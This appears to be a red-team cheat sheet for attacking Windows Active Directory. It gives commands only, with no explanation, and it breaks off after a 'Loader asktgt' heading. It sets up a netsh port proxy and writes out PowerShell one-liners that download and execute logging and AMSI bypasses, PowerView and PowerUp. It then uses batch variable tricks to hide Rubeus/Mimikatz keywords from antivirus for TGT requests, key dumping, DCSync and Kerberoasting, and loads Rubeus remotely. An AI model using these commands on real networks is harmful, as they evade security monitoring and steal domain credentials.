Port Forwarding

netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=8080 connectaddress=192.168.100.1 connectport=80

PowerView

iex(iwr <http://127.0.0.1:8080/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://127.0.0.1:8080/amsibypass.txt> -UseBasicParsing);iex(iwr <http://127.0.0.1:8080/PowerView.ps1> -UseBasicParsing)

PowerUp

iex(iwr <http://127.0.0.1:8080/sbloggingbypass.txt> -UseBasicParsing);iex(iwr <http://127.0.0.1:8080/amsibypass.txt> -UseBasicParsing);iex(iwr <http://127.0.0.1:8080/PowerUp.ps1> -UseBasicParsing)

Loader

wget -Uri <http://127.0.0.1:8080/Loader.exe> -OutFile Loader.exe -UseBasicParsing

asktgt PWN

set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"

ekeys PWN

set "z=s"
set "y=y"
set "x=e"
set "w=k"
set "v=e"
set "u=:"
set "t=:"
set "s=a"
set "r=s"
set "q=l"
set "p=r"
set "o=u"
set "n=k"
set "m=e"
set "l=s"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

DCSync PWN

set "z=c"
set "y=n"
set "x=y"
set "w=s"
set "v=c"
set "u=d"
set "t=:"
set "s=:"
set "r=p"
set "q=m"
set "p=u"
set "o=d"
set "n=a"
set "m=s"
set "l=l"
set "Pwn=%l%%m%%n%%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

Kerberoasting PWN

set "z=t"
set "y=s"
set "x=a"
set "w=o"
set "v=r"
set "u=e"
set "t=b"
set "s=r"
set "r=e"
set "q=k"
set "Pwn=%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

Loader Kerberoasting

Loader.exe -Path <http://127.0.0.1:8080/Rubeus.exe> -Args %Pwn% /simple /nowrap

Loader asktgt